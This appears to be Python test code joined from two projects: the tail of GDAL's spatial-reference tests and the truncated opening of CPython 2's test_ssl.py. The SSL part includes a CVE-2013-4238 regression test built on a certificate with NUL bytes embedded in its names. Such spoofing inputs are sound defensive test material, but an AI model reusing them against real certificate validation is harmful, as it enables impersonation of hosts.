    sr2 = sr.ConvertToOtherProjection('Mercator_1SP')
    assert sr2 is None

    # LCC_1SP -> LCC_2SP: Negative scale factor
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["NTF (Paris)",
        DATUM["Nouvelle_Triangulation_Francaise_Paris",
            SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269]],
        PRIMEM["Paris",2.33722917],
        UNIT["grad",0.01570796326794897]],
    PROJECTION["Lambert_Conformal_Conic_1SP"],
    PARAMETER["latitude_of_origin",46.85],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",-0.99994471],
    PARAMETER["false_easting",234.358],
    PARAMETER["false_northing",4185861.369],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_2SP')
    assert sr2 is None

    # LCC_1SP -> LCC_2SP: Invalid eccentricity
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["NTF (Paris)",
        DATUM["Nouvelle_Triangulation_Francaise_Paris",
            SPHEROID["Clarke 1880 (IGN)",6378249.2,0.1]],
        PRIMEM["Paris",2.33722917],
        UNIT["grad",0.01570796326794897]],
    PROJECTION["Lambert_Conformal_Conic_1SP"],
    PARAMETER["latitude_of_origin",46.85],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",0.99994471],
    PARAMETER["false_easting",234.358],
    PARAMETER["false_northing",4185861.369],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_2SP')
    assert sr2 is None

    # LCC_1SP -> LCC_2SP: Invalid latitude_of_origin
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["NTF (Paris)",
        DATUM["Nouvelle_Triangulation_Francaise_Paris",
            SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269]],
        PRIMEM["Paris",2.33722917],
        UNIT["grad",0.01570796326794897]],
    PROJECTION["Lambert_Conformal_Conic_1SP"],
    PARAMETER["latitude_of_origin",200],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",0.99994471],
    PARAMETER["false_easting",234.358],
    PARAMETER["false_northing",4185861.369],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_2SP')
    assert sr2 is None

    # LCC_1SP -> LCC_2SP: latitude_of_origin == 0
    sr = osr.SpatialReference()
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["NTF (Paris)",
        DATUM["Nouvelle_Triangulation_Francaise_Paris",
            SPHEROID["Clarke 1880 (IGN)",6378249.2,293.4660212936269]],
        PRIMEM["Paris",2.33722917],
        UNIT["grad",0.01570796326794897]],
    PROJECTION["Lambert_Conformal_Conic_1SP"],
    PARAMETER["latitude_of_origin",0],
    PARAMETER["central_meridian",0],
    PARAMETER["scale_factor",0.99994471],
    PARAMETER["false_easting",234.358],
    PARAMETER["false_northing",4185861.369],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_2SP')
    assert sr2 is None

    # LCC_2SP -> LCC_1SP : Invalid standard_parallel_1
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",246.4567],
    PARAMETER["standard_parallel_2",46.4567],
    PARAMETER["latitude_of_origin",46.123],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP')
    assert sr2 is None

    # LCC_2SP -> LCC_1SP : Invalid standard_parallel_2
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",46.4567],
    PARAMETER["standard_parallel_2",246.4567],
    PARAMETER["latitude_of_origin",46.123],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP')
    assert sr2 is None

    # LCC_2SP -> LCC_1SP : Invalid latitude_of_origin
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",46.4567],
    PARAMETER["standard_parallel_2",46.4567],
    PARAMETER["latitude_of_origin",246.123],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP')
    assert sr2 is None

    # LCC_2SP -> LCC_1SP : abs(stdp1) == abs(stdp2)
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",1],
    PARAMETER["standard_parallel_2",-1],
    PARAMETER["latitude_of_origin",10],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP')
    assert sr2 is None

    # LCC_2SP -> LCC_1SP : stdp1 ~= stdp2 ~= 0
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,298.257222101]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",.0000000000000001],
    PARAMETER["standard_parallel_2",.0000000000000002],
    PARAMETER["latitude_of_origin",10],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP')
    assert sr2 is None

    # LCC_2SP -> LCC_1SP : Invalid eccentricity
    sr.SetFromUserInput("""PROJCS["unnamed",
    GEOGCS["RGF93",
        DATUM["Reseau_Geodesique_Francais_1993",
            SPHEROID["GRS 1980",6378137,0.1]],
        PRIMEM["Greenwich",0,
            AUTHORITY["EPSG","8901"]],
        UNIT["degree",0.0174532925199433]],
    PROJECTION["Lambert_Conformal_Conic_2SP"],
    PARAMETER["standard_parallel_1",46.4567],
    PARAMETER["standard_parallel_2",46.4567],
    PARAMETER["latitude_of_origin",46.123],
    PARAMETER["central_meridian",3],
    PARAMETER["false_easting",700000],
    PARAMETER["false_northing",6600000],
    UNIT["metre",1],
    AXIS["Easting",EAST],
    AXIS["Northing",NORTH]]""")
    sr2 = sr.ConvertToOtherProjection('Lambert_Conformal_Conic_1SP')
    assert sr2 is None

###############################################################################
# Test corner cases of osr.SetGeocCS()


def test_osr_basic_setgeogcs():
    """SetGeogCS() with all-None/zero arguments must produce 'unnamed'
    defaults, and calling it on a PROJCS must replace only the GEOGCS."""
    sr = osr.SpatialReference()
    sr.SetGeogCS(None, None, None, 0, 0, None, 0, None, 0)
    assert sr.ExportToWkt() == 'GEOGCS["unnamed",DATUM["unnamed",SPHEROID["unnamed",0,0]],PRIMEM["Reference meridian",0],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST]]'

    sr.SetGeogCS('a', 'b', 'c', 1, 2, 'd', 3, 'e', 4)
    assert sr.ExportToWkt() == 'GEOGCS["a",DATUM["b",SPHEROID["c",1,2]],PRIMEM["d",3],UNIT["e",4],AXIS["Latitude",NORTH],AXIS["Longitude",EAST]]'

    sr.SetUTM(31)
    sr.SetGeogCS(None, None, None, 0, 0, None, 0, None, 0)
    assert sr.ExportToWkt() == 'PROJCS["unnamed",GEOGCS["unnamed",DATUM["unnamed",SPHEROID["unnamed",0,0]],PRIMEM["Reference meridian",0],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",3],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH]]'

###############################################################################
# Test other authorities than EPSG, e.g.
# IGNF:XXXX
#


def test_osr_basic_set_from_user_input_IGNF():
    # SetFromUserInput() must accept AUTHORITY:CODE strings for non-EPSG
    # authorities such as IGNF, and record the authority on the resulting SRS.
    srs = osr.SpatialReference()
    assert srs.SetFromUserInput("IGNF:LAMB93") == 0
    assert srs.GetAuthorityName(None) == 'IGNF' and srs.GetAuthorityCode(None) == 'LAMB93'


def test_osr_basic_set_from_user_input_IGNF_non_existing_code():
    # An unknown code under a known authority must be reported as an error.
    srs = osr.SpatialReference()
    assert srs.SetFromUserInput("IGNF:non_existing_code") != 0


def test_osr_basic_set_from_user_input_non_existing_authority():
    # A completely unknown authority must be reported as an error.
    srs = osr.SpatialReference()
    assert srs.SetFromUserInput("non_existing_auth:1234") != 0


def test_osr_basic_set_from_user_input_GEODCRS():
    # WKT2:2015 GEODCRS input must be accepted and validate cleanly.
    srs = osr.SpatialReference()
    assert srs.SetFromUserInput("""GEODCRS["WGS 84", DATUM["World Geodetic System 1984", ELLIPSOID["WGS 84",6378137,298.257223563, LENGTHUNIT["metre",1]]], PRIMEM["Greenwich",0, ANGLEUNIT["degree",0.0174532925199433]], CS[ellipsoidal,2], AXIS["geodetic latitude (Lat)",north, ORDER[1], ANGLEUNIT["degree",0.0174532925199433]], AXIS["geodetic longitude (Lon)",east, ORDER[2], ANGLEUNIT["degree",0.0174532925199433]], AREA["World"], BBOX[-90,-180,90,180], ID["EPSG",4326]]""") == 0
    assert srs.Validate() == 0


def test_osr_basic_set_from_user_input_GEOGCRS():
    # WKT2:2018 GEOGCRS input (with a USAGE node) must be accepted.
    srs = osr.SpatialReference()
    assert srs.SetFromUserInput("""GEOGCRS["WGS 84", DATUM["World Geodetic System 1984", ELLIPSOID["WGS 84",6378137,298.257223563, LENGTHUNIT["metre",1]]], PRIMEM["Greenwich",0, ANGLEUNIT["degree",0.0174532925199433]], CS[ellipsoidal,2], AXIS["geodetic latitude (Lat)",north, ORDER[1], ANGLEUNIT["degree",0.0174532925199433]], AXIS["geodetic longitude (Lon)",east, ORDER[2], ANGLEUNIT["degree",0.0174532925199433]], USAGE[ SCOPE["unknown"], AREA["World"], BBOX[-90,-180,90,180]], ID["EPSG",4326]]""") == 0
    assert srs.Validate() == 0


def test_osr_basic_set_from_user_input_PROJCRS():
    # WKT2 PROJCRS input (UTM 31N) must be accepted and validate cleanly.
    srs = osr.SpatialReference()
    assert srs.SetFromUserInput("""PROJCRS["WGS 84 / UTM zone 31N", BASEGEODCRS["WGS 84", DATUM["World Geodetic System 1984", ELLIPSOID["WGS 84",6378137,298.257223563, LENGTHUNIT["metre",1]]], PRIMEM["Greenwich",0, ANGLEUNIT["degree",0.0174532925199433]]], CONVERSION["UTM zone 31N", METHOD["Transverse Mercator", ID["EPSG",9807]], PARAMETER["Latitude of natural origin",0, ANGLEUNIT["degree",0.0174532925199433], ID["EPSG",8801]], PARAMETER["Longitude of natural origin",3, ANGLEUNIT["degree",0.0174532925199433], ID["EPSG",8802]], PARAMETER["Scale factor at natural origin",0.9996, SCALEUNIT["unity",1], ID["EPSG",8805]], PARAMETER["False easting",500000, LENGTHUNIT["metre",1], ID["EPSG",8806]], PARAMETER["False northing",0, LENGTHUNIT["metre",1], ID["EPSG",8807]]], CS[Cartesian,2], AXIS["(E)",east, ORDER[1], LENGTHUNIT["metre",1]], AXIS["(N)",north, ORDER[2], LENGTHUNIT["metre",1]], AREA["World - N hemisphere - 0°E to 6°E - by country"], BBOX[0,0,84,6], ID["EPSG",32631]]""") == 0
    assert srs.Validate() == 0


def test_osr_basic_set_from_user_input_COMPOUNDCRS():
    # WKT2 COMPOUNDCRS input (projected + vertical CRS) must be accepted.
    srs = osr.SpatialReference()
    assert srs.SetFromUserInput("""COMPOUNDCRS["KKJ / Finland Uniform Coordinate System + N60 height", PROJCRS["KKJ / Finland Uniform Coordinate System", BASEGEODCRS["KKJ", DATUM["Kartastokoordinaattijarjestelma (1966)", ELLIPSOID["International 1924",6378388,297, LENGTHUNIT["metre",1]]], PRIMEM["Greenwich",0, ANGLEUNIT["degree",0.0174532925199433]]], CONVERSION["Finland Uniform Coordinate System", METHOD["Transverse Mercator", ID["EPSG",9807]], PARAMETER["Latitude of natural origin",0, ANGLEUNIT["degree",0.0174532925199433], ID["EPSG",8801]], PARAMETER["Longitude of natural origin",27, ANGLEUNIT["degree",0.0174532925199433], ID["EPSG",8802]], PARAMETER["Scale factor at natural origin",1, SCALEUNIT["unity",1], ID["EPSG",8805]], PARAMETER["False easting",3500000, LENGTHUNIT["metre",1], ID["EPSG",8806]], PARAMETER["False northing",0, LENGTHUNIT["metre",1], ID["EPSG",8807]]], CS[Cartesian,2], AXIS["northing (X)",north, ORDER[1], LENGTHUNIT["metre",1]], AXIS["easting (Y)",east, ORDER[2], LENGTHUNIT["metre",1]]], VERTCRS["N60 height", VDATUM["Helsinki 1960"], CS[vertical,1], AXIS["gravity-related height (H)",up, LENGTHUNIT["metre",1]]], AREA["Finland - onshore"], BBOX[59.75,19.24,70.09,31.59], ID["EPSG",3901]]""") == 0
    assert srs.Validate() == 0


def test_osr_basic_export_to_sfsql():
    # SFSQL flavour: no AUTHORITY/AXIS nodes in the exported WKT.
    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('WGS84')
    assert sr.ExportToWkt(['FORMAT=SFSQL']) == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563]],PRIMEM["Greenwich",0],UNIT["degree",0.0174532925199433]]'


def test_osr_basic_export_to_wkt1_esri():
    # ESRI flavour: GCS_/D_ name prefixes and underscored names.
    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('WGS84')
    assert sr.ExportToWkt(['FORMAT=WKT1_ESRI']) == 'GEOGCS["GCS_WGS_1984",DATUM["D_WGS_1984",SPHEROID["WGS_1984",6378137.0,298.257223563]],PRIMEM["Greenwich",0.0],UNIT["Degree",0.0174532925199433]]'


def test_osr_basic_export_to_wkt1_gdal():
    # GDAL WKT1 flavour: AUTHORITY and AXIS nodes present.
    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('WGS84')
    assert sr.ExportToWkt(['FORMAT=WKT1_GDAL']) == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]'


def test_osr_basic_export_to_wkt2_2015():
    # WKT2:2015 uses the GEODCRS keyword.
    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('WGS84')
    assert sr.ExportToWkt(['FORMAT=WKT2_2015']) == 'GEODCRS["WGS 84",DATUM["World Geodetic System 1984",ELLIPSOID["WGS 84",6378137,298.257223563,LENGTHUNIT["metre",1]]],PRIMEM["Greenwich",0,ANGLEUNIT["degree",0.0174532925199433]],CS[ellipsoidal,2],AXIS["geodetic latitude (Lat)",north,ORDER[1],ANGLEUNIT["degree",0.0174532925199433]],AXIS["geodetic longitude (Lon)",east,ORDER[2],ANGLEUNIT["degree",0.0174532925199433]],ID["EPSG",4326]]'


def test_osr_basic_export_to_wkt2_2018():
    # WKT2:2018 uses the GEOGCRS keyword instead of GEODCRS.
    sr = osr.SpatialReference()
    sr.SetWellKnownGeogCS('WGS84')
    assert sr.ExportToWkt(['FORMAT=WKT2_2018']) == 'GEOGCRS["WGS 84",DATUM["World Geodetic System 1984",ELLIPSOID["WGS 84",6378137,298.257223563,LENGTHUNIT["metre",1]]],PRIMEM["Greenwich",0,ANGLEUNIT["degree",0.0174532925199433]],CS[ellipsoidal,2],AXIS["geodetic latitude (Lat)",north,ORDER[1],ANGLEUNIT["degree",0.0174532925199433]],AXIS["geodetic longitude (Lon)",east,ORDER[2],ANGLEUNIT["degree",0.0174532925199433]],ID["EPSG",4326]]'


def test_osr_get_name():
    # GetName() is None on an empty SRS and the CRS name once one is set.
    sr = osr.SpatialReference()
    assert sr.GetName() is None
    sr.SetWellKnownGeogCS('WGS84')
    assert sr.GetName() == 'WGS 84'


def test_SetPROJSearchPath():
    # OSRSetPROJSearchPaths() is only taken into priority over other methods
    # starting with PROJ >= 6.1
    if not(osr.GetPROJVersionMajor() > 6 or osr.GetPROJVersionMinor() >= 1):
        pytest.skip()

    # Do the test in a new thread, so that SetPROJSearchPath() is taken
    # into account
    def threaded_function(arg):
        sr = osr.SpatialReference()
        with gdaltest.error_handler():
            arg[0] = sr.ImportFromEPSG(32631)

    try:
        arg = [ -1 ]

        # With the default search path, EPSG import must succeed (returns 0).
        thread = Thread(target = threaded_function, args = (arg, ))
        thread.start()
        thread.join()
        assert arg[0] == 0

        # Pointing the search path at a bogus directory must break EPSG import.
        osr.SetPROJSearchPath('/i_do/not/exist')

        thread = Thread(target = threaded_function, args = (arg, ))
        thread.start()
        thread.join()
        assert arg[0] > 0
    finally:
        # Cancel search path (we can't call SetPROJSearchPath(None))
        osr.SetPROJSearchPaths([])
        sr = osr.SpatialReference()
        assert sr.ImportFromEPSG(32631) == 0


def test_osr_import_projjson():
    # PROJJSON input requires PROJ >= 6.2; a truncated document must fail.
    sr = osr.SpatialReference()
    projjson = '{"$schema":"https://proj.org/schemas/v0.1/projjson.schema.json","type":"GeographicCRS","name":"WGS 84","datum":{"type":"GeodeticReferenceFrame","name":"World Geodetic System 1984","ellipsoid":{"name":"WGS 84","semi_major_axis":6378137,"inverse_flattening":298.257223563}},"coordinate_system":{"subtype":"ellipsoidal","axis":[{"name":"Geodetic latitude","abbreviation":"Lat","direction":"north","unit":"degree"},{"name":"Geodetic longitude","abbreviation":"Lon","direction":"east","unit":"degree"}]},"area":"World","bbox":{"south_latitude":-90,"west_longitude":-180,"north_latitude":90,"east_longitude":180},"id":{"authority":"EPSG","code":4326}}'
    with gdaltest.error_handler():
        ret = sr.SetFromUserInput(projjson)
    if osr.GetPROJVersionMajor() > 6 or osr.GetPROJVersionMinor() >= 2:
        assert ret == 0

    broken_projjson = projjson[0:-10]
    with gdaltest.error_handler():
        assert sr.SetFromUserInput(broken_projjson) != 0


def test_osr_export_projjson():
    # ExportToPROJJSON() requires PROJ >= 6.2; otherwise only check it errors.
    sr = osr.SpatialReference()
    sr.SetFromUserInput('WGS84')

    if not(osr.GetPROJVersionMajor() > 6 or osr.GetPROJVersionMinor() >= 2):
        with gdaltest.error_handler():
            sr.ExportToPROJJSON()
        pytest.skip()

    assert sr.ExportToPROJJSON() != ''


def test_osr_promote_to_3D():
    # PromoteTo3D() requires PROJ >= 7; WGS 84 (4326) promotes to EPSG:4979.
    sr = osr.SpatialReference()
    sr.SetFromUserInput('WGS84')

    if osr.GetPROJVersionMajor() < 7:
        with gdaltest.error_handler():
            sr.PromoteTo3D()
        pytest.skip()

    assert sr.PromoteTo3D() == 0
    assert sr.GetAuthorityCode(None) == '4979'
# ===== test_ssl.py (CPython 2, Lib/test/test_ssl.py) =====
# -*- coding: utf-8 -*-
# Test the support for SSL and sockets

import sys
import unittest
from test import test_support as support
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing

# Skip the whole module if the interpreter was built without the ssl module.
ssl = support.import_module("ssl")

PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST


def data_file(*name):
    # Resolve a test-fixture path relative to this file's directory.
    return os.path.join(os.path.dirname(__file__), *name)

# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.

CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")

# empty CRL
CRLFILE = data_file("revocation.crl")

# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")

REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")

EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")

DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())


def handle_error(prefix):
    # Print the current exception (prefixed) when tests run verbosely.
    exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
    if support.verbose:
        sys.stdout.write(prefix + exc_format)


class BasicTests(unittest.TestCase):

    def test_sslwrap_simple(self):
        # A crude test for the legacy API
        try:
            ssl.sslwrap_simple(socket.socket(socket.AF_INET))
        except IOError, e:
            if e.errno == 32:  # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
                pass
            else:
                raise
        try:
            ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
        except IOError, e:
            if e.errno == 32:  # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
                pass
            else:
                raise


def can_clear_options():
    # 0.9.8m or higher
    return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)


def no_sslv2_implies_sslv3_hello():
    # 0.9.7h or higher
    return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)


def have_verify_flags():
    # 0.9.8 or higher
    return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)


def utc_offset(): #NOTE: ignore issues like #1647654
    # local time = utc time + utc offset
    if time.daylight and time.localtime().tm_isdst > 0:
        return -time.altzone  # seconds
    return -time.timezone


def asn1time(cert_time):
    # Some versions of OpenSSL ignore seconds, see #18207
    # 0.9.8.i
    if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
        fmt = "%b %d %H:%M:%S %Y GMT"
        dt = datetime.datetime.strptime(cert_time, fmt)
        dt = dt.replace(second=0)
        cert_time = dt.strftime(fmt)
        # %d adds leading zero but ASN1_TIME_print() uses leading space
        if cert_time[4] == "0":
            cert_time = cert_time[:4] + " " + cert_time[5:]
    return cert_time


# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
    if hasattr(ssl, 'PROTOCOL_SSLv2'):
        @functools.wraps(func)
        def f(*args, **kwargs):
            try:
                ssl.SSLContext(ssl.PROTOCOL_SSLv2)
            except ssl.SSLError:
                if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
                    platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
                    raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
            return func(*args, **kwargs)
        return f
    else:
        return func


needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")


class BasicSocketTests(unittest.TestCase):

    def test_constants(self):
        # Merely referencing the constants checks they exist.
        ssl.CERT_NONE
        ssl.CERT_OPTIONAL
        ssl.CERT_REQUIRED
        ssl.OP_CIPHER_SERVER_PREFERENCE
        ssl.OP_SINGLE_DH_USE
        if ssl.HAS_ECDH:
            ssl.OP_SINGLE_ECDH_USE
        if ssl.OPENSSL_VERSION_INFO >= (1, 0):
            ssl.OP_NO_COMPRESSION
        self.assertIn(ssl.HAS_SNI, {True, False})
        self.assertIn(ssl.HAS_ECDH, {True, False})

    def test_random(self):
        v = ssl.RAND_status()
        if support.verbose:
            sys.stdout.write("\n RAND_status is %d (%s)\n"
                             % (v, (v and "sufficient randomness") or "insufficient randomness"))
        if hasattr(ssl, 'RAND_egd'):
            self.assertRaises(TypeError, ssl.RAND_egd, 1)
            self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
        ssl.RAND_add("this is a random string", 75.0)

    def test_parse_cert(self):
        # note that this uses an 'unofficial' function in _ssl.c,
        # provided solely for this test, to exercise the certificate
        # parsing code
        p = ssl._ssl._test_decode_cert(CERTFILE)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['issuer'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                        )
        # Note the next three asserts will fail if the keys are regenerated
        self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
        self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
        self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
        self.assertEqual(p['subject'],
                         ((('countryName', 'XY'),),
                          (('localityName', 'Castle Anthrax'),),
                          (('organizationName', 'Python Software Foundation'),),
                          (('commonName', 'localhost'),))
                        )
        self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
        # Issue #13034: the subjectAltName in some certificates
        # (notably projects.developer.nokia.com:443) wasn't parsed
        p = ssl._ssl._test_decode_cert(NOKIACERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        self.assertEqual(p['subjectAltName'],
                         (('DNS', 'projects.developer.nokia.com'),
                          ('DNS', 'projects.forum.nokia.com'))
                        )
        # extra OCSP and AIA fields
        self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
        self.assertEqual(p['caIssuers'],
                         ('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
        self.assertEqual(p['crlDistributionPoints'],
                         ('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))

    def test_parse_cert_CVE_2013_4238(self):
        # Embedded NUL bytes in names must be preserved, not truncated.
        p = ssl._ssl._test_decode_cert(NULLBYTECERT)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
        subject = ((('countryName', 'US'),),
                   (('stateOrProvinceName', 'Oregon'),),
                   (('localityName', 'Beaverton'),),
                   (('organizationName', 'Python Software Foundation'),),
                   (('organizationalUnitName', 'Python Core Development'),),
                   (('commonName', 'null.python.org\x00example.org'),),
                   (('emailAddress', 'python-dev@python.org'),))
        self.assertEqual(p['subject'], subject)
        self.assertEqual(p['issuer'], subject)
        if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
        else:
            # OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
            san = (('DNS', 'altnull.python.org\x00example.com'),
                   ('email', 'null@python.org\x00user@example.org'),
                   ('URI', 'http://null.python.org\x00http://example.org'),
                   ('IP Address', '192.0.2.1'),
                   ('IP Address', '<invalid>'))
        self.assertEqual(p['subjectAltName'], san)

    def test_DER_to_PEM(self):
        # Round-trip PEM -> DER -> PEM -> DER must be lossless.
        with open(CAFILE_CACERT, 'r') as f:
            pem = f.read()
        d1 = ssl.PEM_cert_to_DER_cert(pem)
